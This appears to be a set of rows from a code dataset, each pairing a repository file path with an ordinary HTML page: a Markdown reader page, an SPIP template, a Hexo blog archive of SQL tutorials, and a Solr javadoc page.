<td align="left">Copyright © 2008 Trolltech</td>
<td align="right">Qtopia Sync Agent Documentation</td>
</tr></table></div></address></body>
</html>
|
sandbox/flightpath-to-2d-map-texture/index.html
|
fgx/fgx.github.io
|
<!doctype html>
<html lang=en >
<head>
<meta charset=utf-8 >
<title>FGx FlightPath to 2D Map Texture R1</title>
<meta name=viewport content='width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,minimal-ui' >
<meta name=description content='
Top folder file wrangler: display default file or if location.hash then open, read and apply Markdown to HTML conversion
' >
<meta name=keywords content='AJAX,JavaScript,GitHub,FOSS,STEM' >
<meta name=date content='2016-04-17' >
</head>
<body>
<script src=http://cdnjs.cloudflare.com/ajax/libs/showdown/1.3.0/showdown.min.js ></script>
<script>
// original: https://github.com/jaanga/jaanga.github.io/tree/master/cookbook-html/templates/index-markdown-reader
defaultFile = './flightpath-to-2d-map-texture-r1.html';
init();
function init() {
if ( location.hash ) {
var css, fileName, contents, converter;
fileName = location.hash.slice( 1 );
document.title = fileName.split( '/' ).pop() + ' ~ ' + document.title;
css = document.head.appendChild( document.createElement( 'style' ) );
css.innerHTML =
'body { font: 12pt monospace; left: 0; margin: 0 auto; max-width: 800px; right: 0; }' +
'button, input[type=button] { background-color: #eee; border: 2px #eee solid; color: #888; }' +
'h1 a, h2 a { text-decoration: none; }' +
'a { color: mediumblue; }' +
'';
contents = document.body.appendChild( document.createElement( 'div' ) );
contents.id = 'contents';
converter = new showdown.Converter( { strikethrough: true, literalMidWordUnderscores: true, simplifiedAutoLink: true, tables: true });
xhr = new XMLHttpRequest();
xhr.open( 'get', fileName, true );
xhr.onload = function() { contents.innerHTML = converter.makeHtml( xhr.responseText ); };
xhr.send( null );
} else {
window.location.href = defaultFile + location.hash;
}
}
</script>
</body>
</html>
|
prive/squelettes/contenu/configurer_cpub.html
|
Arterrien/cpub
|
[(#AUTORISER{configurer,_cpub}|sinon_interdire_acces)]
<h1 class="grostitre"><:cpub:titre_page_configurer_cpub:></h1>
<div class="ajax">
#FORMULAIRE_CONFIGURER_CPUB
</div>
|
archives/2021/07/page/2/index.html
|
xperblueray/xperblueray.github.io
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<title>
Archives: 2021/7 |
星空</title>
<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">
<script src="/js/pace.min.js"></script>
<meta name="generator" content="Hexo 5.0.2"></head>
<body>
<main class="content">
<section class="outer">
<article class="articles">
<h1 class="page-type-title">2021/7</h1>
<div class="archives-wrap">
<div class="archive-year-wrap">
<a href="/archives/2021" class="archive-year">2021</a>
</div>
<div class="archives">
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E7%AE%A1%E7%90%86%E4%BA%8B%E5%8A%A1%E5%A4%84%E7%90%86/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E7%AE%A1%E7%90%86%E4%BA%8B%E5%8A%A1%E5%A4%84%E7%90%86/">SQL管理事务处理</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E7%BB%84%E5%90%88%E6%9F%A5%E8%AF%A2/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E7%BB%84%E5%90%88%E6%9F%A5%E8%AF%A2/">SQL组合查询</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E4%BD%BF%E7%94%A8%E5%AD%90%E6%9F%A5%E8%AF%A2/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E4%BD%BF%E7%94%A8%E5%AD%90%E6%9F%A5%E8%AF%A2/">SQL使用子查询</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E9%AB%98%E7%BA%A7SQL%E7%89%B9%E6%80%A7/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E9%AB%98%E7%BA%A7SQL%E7%89%B9%E6%80%A7/">SQL高级SQL特性</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E4%BD%BF%E7%94%A8%E6%B8%B8%E6%A0%87/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E4%BD%BF%E7%94%A8%E6%B8%B8%E6%A0%87/">SQL使用游标</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E4%BD%BF%E7%94%A8%E6%95%B0%E6%8D%AE%E5%A4%84%E7%90%86%E5%87%BD%E6%95%B0/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E4%BD%BF%E7%94%A8%E6%95%B0%E6%8D%AE%E5%A4%84%E7%90%86%E5%87%BD%E6%95%B0/">SQL使用数据处理函数</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/SQL%E6%9B%B4%E6%96%B0%E5%92%8C%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE/" class="archive-article-date">
<time datetime="2021-07-21T14:16:16.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/SQL%E6%9B%B4%E6%96%B0%E5%92%8C%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE/">SQL更新和删除数据</a>
</h2>
</header>
</div>
</article>
<article class="archive-article archive-type-post">
<div class="archive-article-inner">
<header class="archive-article-header">
<a href="/2021/07/21/%E4%BF%AE%E6%94%B9%E5%B7%B2%E6%8F%90%E4%BA%A4%E5%88%B0github%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E9%82%AE%E7%AE%B1/" class="archive-article-date">
<time datetime="2021-07-21T13:44:59.000Z" itemprop="datePublished">07/21</time>
</a>
<h2 itemprop="name">
<a class="archive-article-title" href="/2021/07/21/%E4%BF%AE%E6%94%B9%E5%B7%B2%E6%8F%90%E4%BA%A4%E5%88%B0github%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E9%82%AE%E7%AE%B1/">修改已提交到github的用户名和邮箱</a>
</h2>
</header>
</div>
</article>
</div>
</div>
<nav class="page-nav">
<a class="extend prev" rel="prev" href="/archives/2021/07/">Prev page</a><a class="page-number" href="/archives/2021/07/">1</a><span class="page-number current">2</span>
</nav>
</section>
<footer class="footer">
<div class="outer">
<div class="float-right">
<ul class="list-inline">
<li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
<li><i class="fe fe-bookmark"></i> <span id="busuanzi_value_page_pv"></span></li>
</ul>
</div>
<ul class="list-inline">
<li>© 2021 星空</li>
<li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
<li>Theme <a target="_blank" rel="noopener" href="https://github.com/zhwangart/hexo-theme-ocean">Ocean</a></li>
</ul>
</div>
</footer>
</main>
<aside class="sidebar">
<button class="navbar-toggle"></button>
<nav class="navbar">
<div class="logo">
<a href="/"><img src="/images/hexo.svg" alt="星空"></a>
</div>
<ul class="nav nav-main">
<li class="nav-item">
<a class="nav-item-link" href="/">Home</a>
</li>
<li class="nav-item">
<a class="nav-item-link" href="/archives">Archives</a>
</li>
<li class="nav-item">
<a class="nav-item-link" href="/gallery">Gallery</a>
</li>
<li class="nav-item">
<a class="nav-item-link" href="/about">About</a>
</li>
<li class="nav-item">
<a class="nav-item-link nav-item-search" title="Search">
<i class="fe fe-search"></i>
Search
</a>
</li>
</ul>
</nav>
<nav class="navbar navbar-bottom">
<ul class="nav">
<li class="nav-item">
<div class="totop" id="totop">
<i class="fe fe-rocket"></i>
</div>
</li>
<li class="nav-item">
<a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
<i class="fe fe-feed"></i>
</a>
</li>
</ul>
</nav>
<div class="search-form-wrap">
<div class="local-search local-search-plugin">
<input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
<div id="local-search-result" class="local-search-result"></div>
</div>
</div>
</aside>
<script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/lazyload.min.js"></script>
<script src="/js/snap.svg-min.js"></script>
<script src="/js/busuanzi-2.3.pure.min.js"></script>
<script src="/fancybox/jquery.fancybox.min.js"></script>
<script src="/js/ocean.js"></script>
</body>
</html>
|
solr-5.0.0/docs/solr-map-reduce/org/apache/solr/hadoop/class-use/SolrInputDocumentWritable.html
|
annieweng/solr_example
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_55) on Sun Feb 15 12:27:17 PST 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Uses of Class org.apache.solr.hadoop.SolrInputDocumentWritable (Solr 5.0.0 API)</title>
<meta name="date" content="2015-02-15">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.solr.hadoop.SolrInputDocumentWritable (Solr 5.0.0 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/solr/hadoop/class-use/SolrInputDocumentWritable.html" target="_top">Frames</a></li>
<li><a href="SolrInputDocumentWritable.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.solr.hadoop.SolrInputDocumentWritable" class="title">Uses of Class<br>org.apache.solr.hadoop.SolrInputDocumentWritable</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">SolrInputDocumentWritable</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#org.apache.solr.hadoop">org.apache.solr.hadoop</a></td>
<td class="colLast">
<div class="block"><a href="../../../../../org/apache/solr/hadoop/MapReduceIndexerTool.html" title="class in org.apache.solr.hadoop"><code>MapReduceIndexerTool</code></a> and related code.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="org.apache.solr.hadoop">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">SolrInputDocumentWritable</a> in <a href="../../../../../org/apache/solr/hadoop/package-summary.html">org.apache.solr.hadoop</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../org/apache/solr/hadoop/package-summary.html">org.apache.solr.hadoop</a> with parameters of type <a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">SolrInputDocumentWritable</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>int</code></td>
<td class="colLast"><span class="strong">SolrCloudPartitioner.</span><code><strong><a href="../../../../../org/apache/solr/hadoop/SolrCloudPartitioner.html#getPartition(org.apache.hadoop.io.Text, org.apache.solr.hadoop.SolrInputDocumentWritable, int)">getPartition</a></strong>(org.apache.hadoop.io.Text key,
<a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">SolrInputDocumentWritable</a> value,
int numPartitions)</code> </td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Method parameters in <a href="../../../../../org/apache/solr/hadoop/package-summary.html">org.apache.solr.hadoop</a> with type arguments of type <a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">SolrInputDocumentWritable</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>protected void</code></td>
<td class="colLast"><span class="strong">SolrReducer.</span><code><strong><a href="../../../../../org/apache/solr/hadoop/SolrReducer.html#reduce(org.apache.hadoop.io.Text, java.lang.Iterable, org.apache.hadoop.mapreduce.Reducer.Context)">reduce</a></strong>(org.apache.hadoop.io.Text key,
<a href="http://download.oracle.com/javase/7/docs/api/java/lang/Iterable.html?is-external=true" title="class or interface in java.lang">Iterable</a><<a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">SolrInputDocumentWritable</a>> values,
org.apache.hadoop.mapreduce.Reducer.Context context)</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/solr/hadoop/SolrInputDocumentWritable.html" title="class in org.apache.solr.hadoop">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/solr/hadoop/class-use/SolrInputDocumentWritable.html" target="_top">Frames</a></li>
<li><a href="SolrInputDocumentWritable.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2000-2015 Apache Software Foundation. All Rights Reserved.</i>
<script src='../../../../../prettify.js' type='text/javascript'></script>
<script type='text/javascript'>
(function(){
var oldonload = window.onload;
if (typeof oldonload != 'function') {
window.onload = prettyPrint;
} else {
window.onload = function() {
oldonload();
prettyPrint();
}
}
})();
</script>
</small></p>
</body>
</html>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.